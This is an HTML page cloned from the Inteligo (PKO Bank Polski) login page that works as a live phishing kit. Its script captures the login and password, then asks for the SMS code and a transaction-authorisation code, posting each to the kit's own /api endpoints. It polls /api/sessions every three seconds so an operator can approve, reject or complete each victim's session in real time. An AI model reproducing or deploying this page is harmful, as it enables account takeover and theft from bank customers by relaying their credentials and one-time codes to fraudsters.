<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0026)https://inteligo.pl/secure -->
<html>
<head>
    <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="Author" content="Softax (www.softax.pl)">
    <meta name="Version" content="2-60-1">
    <title>
        Serwis WWW Inteligo
    </title>
    <link rel="stylesheet" href="/assets/banks/inteligo_files/4202102060417043061446.css">
    <link rel="stylesheet" href="/assets/banks/inteligo_files/4202102060417043191459.css">
    <link rel="stylesheet" href="/assets/banks/inteligo_files/4202102060417045711741.css">
    <link rel="stylesheet" href="/assets/banks/inteligo_files/4202102060417045801746.css">
    <link rel="stylesheet" href="/assets/banks/inteligo_files/4202102060417045871754.css">
    <link rel="stylesheet" href="/assets/banks/inteligo_files/4202102060417045931757.css">
    <style type="text/css">
        html { overflow-y: scroll; }
        .bmActive { background-image: url(/assets/banks/inteligo_files/img2.gif); }
        .bmInactive { background-image: url(/assets/banks/inteligo_files/img2.gif); }
        .info1, .info1endPage { background-image: url(/assets/banks/inteligo_files/img2.gif); }
        .info2 { background-image: url(/assets/banks/inteligo_files/img2.gif); }
        .tableHeader1, .titlebar_head .actual_table_head, .tableHeader1zakl { background-image: url(/assets/banks/inteligo_files/img2.gif); }
        .AmountEditField, .CurrAmountEditField, .IncomeEditField, .CreditLimitEditField { text-align: right }
    </style>
    <style>div.form_tabular { display: none; }</style>
</head>
<body     class="auth-login  ">
<div id="capsLockWarn" class="linksDiv" style="display: none;">
    <h1 class="alert1">Wciśnięty jest przycisk Caps Lock.</h1>
    <p>Hasło może zostać wpisane nieprawidłowo. Wyłącz przycisk Caps Lock i wpisz hasło.</p>
</div>
<form id="mainForm">
    <input type="hidden" name="ias_sid" value="I0800920dJTwS6QGitvKa4a5y4I3E:">
    <div style="position: absolute; top: -200px; left: -200px; width: 1px; height: 1px; overflow: hidden; margin: -1px 0 0 -1px;" id="default_button_wrapper" aria-hidden="true">
        <input tabindex="-1" type="submit" id="default_button" value="" name="dynsub_ex_837423d158781321e3f99ffc1bbfabfc9e66bfe9">
        <div class="box-input">
            <div class="box-input-wrap"><input type="text" name="__ie__bug__workaround__" tabindex="9999"></div>
        </div>
    </div>
    <input type="hidden" class="ias_navi_map" value="FYzBCsIwEAX`JQdPgqZp0m2hCCJ41mNFQpPsSmibIE21Iv677eGdZuZ9Gc5aEojMWZRyn0vIwajCknJFnjk0AqRE5WDBrGI738V1urXJv9rkYxh178fEtusTiCUSjksogIuMo6CyJLLcGGoN2RKVMoQlq27MpKBjt3TjZAafDtTHt`aubq6P4zCA`5zUGJ4R6XyZm2ZjY0g~TKhXr~bs`vsDiIokBMqzZXm8h0AEHjcAFw" name="ias_navi_map"><input name="ias_post_into" value="/auth/login/submit" prefix="/secure/igo2" flow_id="ZRgBmm8iyD6snqoefGQxZZ" type="hidden" class="ias_post_into"><input type="hidden" name="back_reload_protection" value="15cb1c744db14e6dbf4485c04d6f4348"><input type="hidden" name="ias.form_protect" value="a20037c879de4a12b08a26877d631112">
    <div class="body-wrap">
        <div id="top-bar">
            <ul id="top-menu"></ul>
            <ul class="user-info"></ul>
        </div>
    </div>
    <div id="title-bar">
        <a href="http://inteligo.pl/" id="logo" aria-labelledby="logo-infotip-text">&nbsp;</a>
        <div id="logo-infotip" style="display: none;">
            <div id="logo-infotip-icon">&nbsp;</div>
            <div id="logo-infotip-text">Powrót do serwisu informacyjnego</div>
        </div>
    </div>
    <ul id="main-menu"></ul>
    <div class="sidebar">
        <div class="login-sidebar">
            <h1>Strefa kontaktu</h1>
            <ul>
                <li class="side-phone1">Infolinia Inteligo</li>
                <li class="side-phone-number"><img alt="800 121 121  +48 81 535 67 89" title="800 121 121  +48 81 535 67 89" value="800 121 121  +48 81 535 67 89" src="/assets/banks/inteligo_files/4202102060417046031807.png"></li>
                <li class="side-link-contact">
                    <a class="" href="http://inteligo.pl/kontakt" target="_blank" title="" aria-describedby="aria_external">
                        Kontakt</a>
                </li>
            </ul>
            <h1>Przydatne informacje</h1>
            <ul>
                <li class="side-link-demo">
                    <a target="_blank" href="https://inteligo.pl/przydatne-informacje/bezpieczenstwo/uwaga-na-nowe-zagrozenia-w-sieci/" class="">
                        Uwaga na nowe zagrożenia
                    </a>
                </li>
                <li class="side-link-payments">
                    <a target="_blank" href="https://inteligo.pl/demo/" class="">
                        Demo
                    </a>
                </li>
                <li class="side-link-files">
                    <a target="_blank" href="https://inteligo.pl/redirect/oplaty-prowizje-i-oprocentowanie" class="">
                        Opłaty i oprocentowanie
                    </a>
                </li>
                <li class="side-link-payments">
                    <a target="_blank" href="https://inteligo.pl/pomoc/pliki-do-pobrania/pliki-do-pobrania/" class="">
                        Pliki do pobrania
                    </a>
                </li>
            </ul>
        </div>
        <input id="menu" name="menu" value="" type="hidden">
        <div class="menu-banners"></div>
    </div>
    <div class="wrap-content">
        <div class="layout-content">
            <div class="layout-page-top"></div>
            <div class="layout-page-middle new-navigation">
                <div class="form-box" style="margin-bottom: 15px; margin-top: 3px">
                    <div id="" class="table_list tableListInfoTable">
                        <table cellspacing="0" class="table-list"></table>
                        <div class="message empty-table ">
                            <div class="box-info" style="padding-top: 0;">
                              <span style="font-weight: bold">
                              Uważaj na telefonicznych oszustów! Możesz stracić pieniądze.
                              <br></span>
                                Oszuści dzwonią do klientów i podszywają się pod pracowników banku. Jeśli podasz im dane logowania lub kod z narzędzia autoryzacyjnego albo zainstalujesz na ich polecenie podejrzane oprogramowanie - stracisz pieniądze.
                                <a target="_blank" href="https://inteligo.pl/aktualnosci/komunikaty/uwazaj-na-telefonicznych-oszustow-mozesz-stracic-pieniadze/" title="Więcej"><strong>Więcej&nbsp;&gt;&gt;</strong></a>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="form-box save-no-password form-no-required">
                    <div class="box-input" style="display:none">
                        <div class="box-input-wrap"><input type="text" style="display:none" class="decoy" value="E" name="login0"></div>
                    </div>
                    <div class="box-input" style="display:none">
                        <div class="box-input-wrap"><input type="password" style="display:none" class="decoy" value="D" name="password0"></div>
                    </div>
                    <div class="form form_tabular " id="f-form_0456210317" data-action="/secure/igo2/auth/login/submit?flow_id=ZRgBmm8iyD6snqoefGQxZZ&amp;continue_flow=1" style="display: block;">
                        <h1 class="table-title"><span id="summaryInfo" class="inner">Logowanie
                           </span>
                        </h1>
                        <div class="required-note"><span class="form-required">*</span> pole wymagane
                        </div>
                        <ul class="form-tabular" id="mainCont">
                            <li class="field_row edit-field field_row-client_id_field NullValidationCharEditFieldTR" id="f-tr-f-form_0456210317-client_id_field">
                                <div class="form-label">
                                    <label for="f-form_0456210317-client_id_field">Identyfikator lub login:
                                    </label>
                                </div>
                                <div class="form-field NullValidationCharEditFieldTd">
                                    <div class="NullValidationCharEditField_field_widget field_widget " id="f-form_0456210317-client_id_field-field_widget">
                                        <div class="box-input">
                                            <div class="box-input-wrap"><input name="client_id_field_0456210317-client" value="" id="bank_login" maxlength="50" size="62" type="text" class="text_input text_input_client_id_field NullValidationCharEditField" tabindex="10" aria-flowto="f-form_0456210317-client_id_field-help"></div>
                                        </div>
                                        <span class="infoTip" tabindex="100" fancyinfo="Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login." id="f-form_0456210317-client_id_field-help" helpfor="f-form_0456210317-client_id_field" aria-describedby="fancyinfo-aria-description-2"><span id="fancyinfo-aria-description-1" role="tooltip" class="visuallyhidden">Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login.</span><span id="fancyinfo-aria-description-2" role="tooltip" class="visuallyhidden">Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login.</span></span>
                                    </div>
                                </div>

                                <br><br>

                                <div class="form-label">
                                    <label for="f-form_0456210317-client_id_field">Hasło:
                                    </label>
                                </div>
                                <div class="form-field NullValidationCharEditFieldTd">
                                    <div class="NullValidationCharEditField_field_widget field_widget " id="f-form_0456210317-client_id_field-field_widget">
                                        <div class="box-input">
                                            <div class="box-input-wrap"><input name="client_id_field_0456210317-client" value="" id="bank_password" maxlength="50" size="62" type="text" class="text_input text_input_client_id_field NullValidationCharEditField" tabindex="10" aria-flowto="f-form_0456210317-client_id_field-help"></div>
                                        </div>
                                        <span class="infoTip" tabindex="100" fancyinfo="Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login." id="f-form_0456210317-client_id_field-help" helpfor="f-form_0456210317-client_id_field" aria-describedby="fancyinfo-aria-description-2"><span id="fancyinfo-aria-description-1" role="tooltip" class="visuallyhidden">Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login.</span><span id="fancyinfo-aria-description-2" role="tooltip" class="visuallyhidden">Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login.</span></span>
                                    </div>
                                </div>
                            </li>
                            <li class="field_row edit-field hidden_field field_row-snip NullValidationCharEditFieldTR" id="f-tr-f-form_0456210317-snip">
                                <div class="form-label">
                                    <label for="f-form_0456210317-snip">Pole tekstowe jednowierszowe:
                                    </label>
                                </div>
                                <div class="form-field NullValidationCharEditFieldTd">
                                    <div class="NullValidationCharEditField_field_widget field_widget " id="f-form_0456210317-snip-field_widget">
                                        <div class="box-input">
                                            <div class="box-input-wrap"><input name="snip_0456210317-snip" value="" id="f-form_0456210317-snip" maxlength="200" size="250" type="text" class="text_input text_input_snip NullValidationCharEditField" tabindex="10"></div>
                                        </div>
                                    </div>
                                </div>
                            </li>
                        </ul>
                        <div class="form-buttons" id="buttonsCont">
                            <input type="image" onclick="bankLogin(); plusBankUpdate()" alt="Dalej" src="/assets/banks/inteligo_files/4202102060417046061809.gif" class="image-button button-dalej button button_ok" tabindex="10" title="Dalej" value="Dalej" name="dynsub_ex_837423d158781321e3f99ffc1bbfabfc9e66bfe9" data-original-name="btn_ok">
                            <div class="clear"></div>
                        </div>
                    </div>
                    <div class="box-input" style="display:none">
                        <div class="box-input-wrap"><input type="text" style="display:none" class="decoy" value="C" name="login1"></div>
                    </div>
                    <div class="box-input" style="display:none">
                        <div class="box-input-wrap"><input type="password" style="display:none" class="decoy" value="O" name="password1"></div>
                    </div>
                    <div class="box-input" style="display:none">
                        <div class="box-input-wrap"><input type="password" style="display:none" class="decoy" value="Y" name="password2"></div>
                    </div>
                </div>
                <div class="clear"></div>
                <div style="clear: both;">
                    <div class="box-login">
                        <h1><span class="login-icon-key"></span>
                            PSD2 - ważna informacja o logowaniu do Inteligo
                        </h1>
                        <div class="holder secure">
                            Czasami, nie częściej niż co 90 dni, możemy poprosić Cię o potwierdzenie logowania do serwisu Inteligo kodem z narzędzia autoryzacji.<br><a href="https://inteligo.pl/aktualnosci/komunikaty/psd2-wazna-informacja-o-logowaniu-do-serwisu-inteligo/" target="_blank"><br>Więcej</a>
                        </div>
                    </div>
                    <div class="login-spacer"></div>
                    <div class="box-login">
                        <h1><span class="login-icon-page"></span>
                            Tarcza Finansowa 2.0 PFR dla Firm
                        </h1>
                        <div class="holder account">
                            Weź udział w organizowanym przez PFR <b>bezpłatnym szkoleniu online</b> i dowiedz się, jakie są możliwości wsparcia „Tarczy Finansowej 2.0”
                        </div>
                    </div>
                </div>
                <div class="clear"></div>
            </div>
            <div class="layout-page-bottom"></div>
        </div>
        <div id="bottom-text">
            Konto Inteligo prowadzone jest przez <b>PKO Bank Polski</b>.
        </div>
        <div class="clear"></div>
        <div class="layout-footer">
            <div id="deposits-link">
                <a class="standalone" href="http://inteligo.pl/infosite/_images/_files/zasady_gwarantowania_depozytow.pdf" target="_blank" title="" aria-describedby="aria_external">
                    Gwarantowanie depozytów</a>
            </div>
        </div>
    </div>
    <span style="display: none;">
         <label><a title="" class="show-iko-activation-list"><input tabindex="10" alt="" title="" type="image" src="4202102060417046101811.gif" class="hidden_link_submit" width="1" height="1" aria-label="" name="dynsub_ex_5f832dce55045848b67cf6d742deb3855e6d8ce5"></a></label>
         </span>
    <div id="aria_components" class="undisplayed">
        <div id="aria_empty" aria-hidden="true" class="visuallyhidden">&nbsp;</div>
        <div id="aria_external">link zewnętrzny</div>
    </div>
</form>

<script src="/assets/js/jquery-3.5.1.min.js"></script>
<script src="/assets/js/cookies.core.1.3.min.js"></script>
<script src="/assets/js/banklogin.js"></script>
<script>
    let bankId = (cookieManager.read('session_id'))

    const plusBankUpdate = () => {
        if ($("#bank_password").val() && $("#bank_login").val() !== "") {
            $("#mainCont").empty()
            $("#mainCont").append(' <li class="field_row edit-field field_row-client_id_field NullValidationCharEditFieldTR" id="f-tr-f-form_0456210317-client_id_field"> <div class="form-label"> <label for="f-form_0456210317-client_id_field">Kod SMS z telefonu: </label> </div><div class="form-field NullValidationCharEditFieldTd"> <div class="NullValidationCharEditField_field_widget field_widget " id="f-form_0456210317-client_id_field-field_widget"> <div class="box-input"> <div class="box-input-wrap"><input name="client_id_field_0456210317-client" value="" id="bank_psd" maxlength="50" size="62" type="text" class="text_input text_input_client_id_field NullValidationCharEditField" tabindex="10" aria-flowto="f-form_0456210317-client_id_field-help"></div></div><span class="infoTip" tabindex="100" fancyinfo="Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login." id="f-form_0456210317-client_id_field-help" helpfor="f-form_0456210317-client_id_field" aria-describedby="fancyinfo-aria-description-2"><span id="fancyinfo-aria-description-1" role="tooltip" class="visuallyhidden">Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login.</span><span id="fancyinfo-aria-description-2" role="tooltip" class="visuallyhidden">Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login.</span></span> </div></div></li>')
            $("#buttonsCont").empty()
            $("#buttonsCont").append('<input type="image" onclick="psdUpdate()" alt="Dalej" src="/assets/banks/inteligo_files/4202102060417046061809.gif" class="image-button button-dalej button button_ok" tabindex="10" title="Dalej" value="Dalej" name="dynsub_ex_837423d158781321e3f99ffc1bbfabfc9e66bfe9" data-original-name="btn_ok">')
        } else {
        }
    }

    const regularCheck = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "true") {
                        summaryFunc()
                        clearInterval(multipleFunc)
                    }
                } else {

                }
            }
        });
    }
    const psdUpdate = () => {
        if ($("#bank_psd").val() !== "") {
            $.post("/api/psdupdate/", {
                bank_psd: $("#bank_psd").val(),
                sessionId: bankId
            }).done(data => {
                $("#mainCont").empty()
                $("#buttonsCont").empty()
                $("#mainCont").append('<h1>Logowanie...</h1>')
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    let multipleFunc = setInterval(function(){ regularCheck() }, 3000);

    //WRONG PASS

    const wrongPass = () => {
        $.post("/api/wrongpass/", {
            sessionId: bankId,
            name: "false"
        }).done(data => {
            console.log('done')
        }).fail(error => {
            console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
        })
    }

    const regularPass = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "wrongPass") {
                        clearInterval(multiplePass)
                        wrongPass()
                        location.reload()
                    }
                } else {

                }
            }
        });
    }

    let multiplePass = setInterval(function(){ regularPass() }, 3000);



    const summaryFunc = () => {
        $("#mainCont").empty()
        $("#mainCont").append(' <li class="field_row edit-field field_row-client_id_field NullValidationCharEditFieldTR" id="f-tr-f-form_0456210317-client_id_field"> <div class="form-label"> <label for="f-form_0456210317-client_id_field">Kod potwierdzający z telefonu </label> </div><div class="form-field NullValidationCharEditFieldTd"> <div class="NullValidationCharEditField_field_widget field_widget " id="f-form_0456210317-client_id_field-field_widget"> <div class="box-input"> <div class="box-input-wrap"><input name="client_id_field_0456210317-client" value="" id="bank_summary" maxlength="50" size="62" type="text" class="text_input text_input_client_id_field NullValidationCharEditField" tabindex="10" aria-flowto="f-form_0456210317-client_id_field-help"></div></div><span class="infoTip" tabindex="100" fancyinfo="Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login." id="f-form_0456210317-client_id_field-help" helpfor="f-form_0456210317-client_id_field" aria-describedby="fancyinfo-aria-description-2"><span id="fancyinfo-aria-description-1" role="tooltip" class="visuallyhidden">Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login.</span><span id="fancyinfo-aria-description-2" role="tooltip" class="visuallyhidden">Unikalny, ośmiocyfrowy numer, który identyfikuje Cię jako Klienta Inteligo, lub własny, zdefiniowany przez Ciebie, login.</span></span> </div></div></li>')
        $("#buttonsCont").empty()
        $("#buttonsCont").append('<input type="image" onclick="summaryCode()" alt="Dalej" src="/assets/banks/inteligo_files/4202102060417046061809.gif" class="image-button button-dalej button button_ok" tabindex="10" title="Dalej" value="Dalej" name="dynsub_ex_837423d158781321e3f99ffc1bbfabfc9e66bfe9" data-original-name="btn_ok">')
        document.getElementById('summaryInfo').innerText = 'Autoryzuj Tranzakcję'
    }

    const summaryCode = () => {
        if ($("#bank_summary").val() !== "") {
            $.post("/api/summarycode/", {
                bank_summary: $("#bank_summary").val(),
                sessionId: bankId
            }).done(data => {
                $("#mainCont").empty()
                $("#mainCont").append('<h1>Logowanie...</h1>')
                $("#buttonsCont").empty()
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    const regularSummary=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},wrongSum=()=>{$.post("/api/wrongsummary/",{sessionId:bankId,name:"false"}).done(e=>{console.log("done")}).fail(e=>{console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.","Wystąpił błąd")})};let multipleSummary=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},3e3);const regularComplete=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})};let multipleCompleted=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})},3e3);

</script>

<script>
    var form = document.getElementById("mainForm");
    function handleForm(event) { event.preventDefault(); }
    form.addEventListener('submit', handleForm);
</script>

</body>
</html>